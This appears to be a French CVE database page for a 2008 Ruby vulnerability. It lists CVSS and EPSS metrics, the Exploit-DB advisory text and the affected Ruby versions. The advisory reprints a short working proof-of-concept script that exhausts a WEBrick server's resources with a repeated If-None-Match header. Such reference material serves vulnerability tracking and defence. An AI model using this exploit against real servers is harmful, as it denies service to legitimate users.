Faiblesses connexes
CWE-ID |
Nom de la faiblesse |
Source |
CWE-399 |
Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
|
Métriques
Métriques |
Score |
Gravité |
CVSS Vecteur |
Source |
V2 |
7.8 |
|
AV:N/AC:L/Au:N/C:N/I:N/A:C |
[email protected] |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 32222
Date de publication : 2008-08-10 22h00 +00:00
Auteur : Keita Yamaguchi
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/30644/info
Ruby is prone to multiple vulnerabilities that can be leveraged to bypass security restrictions or cause a denial of service:
- Multiple security-bypass vulnerabilities occur because of errors in the 'safe level' restriction implementation. Attackers can leverage these issues to make insecure function calls and perform 'Syslog' operations.
- An error affecting 'WEBrick::HHTP::DefaultFileHandler' can exhaust system resources and deny service to legitimate users.
- A flaw in 'dl' can allow attackers to call unauthorized functions.
Attackers can exploit these issues to perform unauthorized actions on affected applications. This may aid in compromising the application and possibly the underlying computers. Attackers can also cause denial-of-service conditions.
These issues affect Ruby 1.8.5, 1.8.6-p286, 1.8.7-p71, and 1.9 r18423. Prior versions are also vulnerable.
#-- Exploitable Server --
# require 'webrick'
# WEBrick::HTTPServer.new(:Port => 2000, :DocumentRoot => "/etc").start
#-- Attack --
require 'net/http'
res = Net::HTTP.start("localhost", 2000) { |http|
req = Net::HTTP::Get.new("/passwd")
req['If-None-Match'] = %q{meh=""} + %q{foo="bar" } * 100
http.request(req)
}
p res
Products Mentioned
Configuraton 0
Ruby-lang>>Ruby >> Version To (including) 1.8.5
Ruby-lang>>Ruby >> Version 1.6.8
Ruby-lang>>Ruby >> Version 1.8.0
Ruby-lang>>Ruby >> Version 1.8.1
Ruby-lang>>Ruby >> Version 1.8.1
Ruby-lang>>Ruby >> Version 1.8.2
Ruby-lang>>Ruby >> Version 1.8.2
Ruby-lang>>Ruby >> Version 1.8.2
Ruby-lang>>Ruby >> Version 1.8.2
Ruby-lang>>Ruby >> Version 1.8.3
Ruby-lang>>Ruby >> Version 1.8.3
Ruby-lang>>Ruby >> Version 1.8.3
Ruby-lang>>Ruby >> Version 1.8.3
Ruby-lang>>Ruby >> Version 1.8.4
Ruby-lang>>Ruby >> Version 1.8.4
Ruby-lang>>Ruby >> Version 1.8.4
Ruby-lang>>Ruby >> Version 1.8.4
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.5
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.6
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.8.7
Ruby-lang>>Ruby >> Version 1.9.0
Références